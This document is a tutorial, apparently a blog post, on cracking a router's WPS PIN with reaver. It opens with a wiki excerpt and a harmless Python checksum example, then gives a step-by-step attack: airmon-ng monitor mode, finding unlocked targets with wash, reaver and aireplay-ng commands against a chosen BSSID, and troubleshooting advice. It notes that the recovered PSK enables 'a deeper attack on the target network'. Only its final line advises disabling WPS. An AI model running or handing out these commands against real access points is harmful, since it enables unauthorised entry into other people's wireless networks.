WPS is a known vulnerability of some routers. A short excerpt from the reaver-wps wiki describing the WPS attack:
Reaver performs a brute force attack against the AP, attempting every possible combination in order to guess the AP’s 8 digit pin number. Since the pin numbers are all numeric, there are 10^8 (100,000,000) possible values for any given pin number. However, because the last digit of the pin is a checksum value which can be calculated based on the previous 7 digits, that key space is reduced to 10^7 (10,000,000) possible values. The key space is reduced even further due to the fact that the WPS authentication protocol cuts the pin in half and validates each half individually. That means that there are 10^4 (10,000) possible values for the first half of the pin and 10^3 (1,000) possible values for the second half of the pin, with the last digit of the pin being a checksum. Reaver brute forces the first half of the pin and then the second half of the pin, meaning that the entire key space for the WPS pin number can be exhausted in 11,000 attempts.
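The checksum and the split key space described in the excerpt, worked through in code. This is an added example and is not part of the original post or of the reaver project; the checksum weighting (3, 1, 3, 1, 3, 1, 3 over the seven leading digits) is the one defined in the WPS specification, and the PIN 12345670 used in the test is a sample value. It lets an administrator see why an 8-digit WPS PIN offers nowhere near the 10^8 resistance its length suggests, which is the reason the closing advice of this post (disable WPS) matters.

```python
# Added example: WPS PIN checksum digit and the effective PIN search space.
# The weighting (3,1,3,1,3,1,3 over digits 1-7) is the WPS-specified checksum.

WEIGHTS = (3, 1, 3, 1, 3, 1, 3)


def wps_checksum(first_seven: str) -> int:
    """Return the checksum digit that completes a 7-digit WPS PIN prefix."""
    if len(first_seven) != 7 or not first_seven.isdigit():
        raise ValueError("expected exactly seven decimal digits")
    total = sum(w * int(d) for w, d in zip(WEIGHTS, first_seven))
    return (10 - total % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if an 8-digit PIN's last digit matches the checksum of the first seven."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return int(pin[7]) == wps_checksum(pin[:7])


def pin_search_space() -> dict:
    """Number of candidate PINs under each model the excerpt describes."""
    naive = 10 ** 8               # every 8-digit string
    with_checksum = 10 ** 7       # digit 8 is fixed by digits 1-7
    first_half = 10 ** 4          # digits 1-4, confirmed on their own by the AP
    second_half = 10 ** 3         # digits 5-7; digit 8 is the checksum
    return {
        "naive": naive,
        "with_checksum": with_checksum,
        "first_half": first_half,
        "second_half": second_half,
        # halves are tried one after the other, so the costs add rather than multiply
        "split_halves": first_half + second_half,
    }


if __name__ == "__main__":
    sample = "1234567"
    print(f"{sample} + checksum -> {sample}{wps_checksum(sample)}")
    for name, count in pin_search_space().items():
        print(f"{name:>14}: {count:,}")
```

The split_halves figure is the 11,000 worst-case attempts quoted in the excerpt; comparing it with the naive 100,000,000 is the whole argument for treating an enabled WPS PIN as a weak credential.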
Enable wireless card monitor mode
First, we need a wireless card capable of packet injection. To determine whether your card is capable of packet injection, check the tutorial on Aircrack-ng's website, since that is out of scope for this tutorial.
Assuming you have a capable card, let’s switch it from managed to monitor mode. Kill all processes that can interrupt monitor mode:
# airmon-ng check kill
Enable monitor mode:
# airmon-ng start wlan0
If you don't know which interface your wireless card is, issue the command ip addr show. Wireless interfaces are marked IEEE 802.11bgn; your wireless card will probably be named wlan0 or something similar.
Airmon will create a new interface called wlan0mon, which is your wlan0 but in monitor mode.
Find a vulnerable AP (access point/router)
We will use the wash command to find a WPS-vulnerable access point.
# wash -i wlan0mon
If you encounter the error [!] Found packet with bad FCS, skipping..., try:
# wash -i wlan0mon --ignore-fcs
Wash will then show APs with WPS enabled. If an AP is listed with WPS Locked set to No, that AP is WPS vulnerable.
Select your target AP and take note of its BSSID and Channel.
Launch the attack
Now that we have the target AP's BSSID and channel, we can proceed to launch the attack:
reaver -i wlan0mon -b <BSSID> -c <channel> -a -vv
# reaver -i wlan0mon -b C0:C1:C0:E7:D1:81 -c 11 -a -vv
-a tells reaver to automatically adjust based on the target's behaviour, and -vv is for verbosity. Check reaver --help for more options.
Some wireless cards, like the Alfa AWUS036NH I used, encounter an association error. You can fix this by opening another terminal and doing the association with:
# aireplay-ng -1 0 -a <BSSID> <interface>
Then modify your reaver command by adding the -A argument, meaning that the association is done in a separate process:
# reaver -i wlan0mon -b C0:C1:C0:E7:D1:81 -c 11 -a -vv -A
Another thing to look out for is when you get M5 right away and then a timeout error when sending the M6 message. It might be that the target AP does have WPS enabled but is not configured. Don't waste your time on this AP; I've tried it and reaver will never get the PIN. See the discussion here.
If you're receiving NACK messages, it means the AP is responding to WPS requests as expected.
Patience is a virtue
It will take around 10 hours or even days, depending on the signal strength, for reaver to crack the PIN. The good thing is that you can pause reaver (Ctrl+C) and resume the attack at another time. You can leave Reaver running overnight if you wish.
Once Reaver has cracked the PIN, it will show the PSK of the AP. You can now connect to it and perform a deeper attack on the target network.
To prevent this kind of attack, disable WPS on your routers, or don't use routers with WPS at all.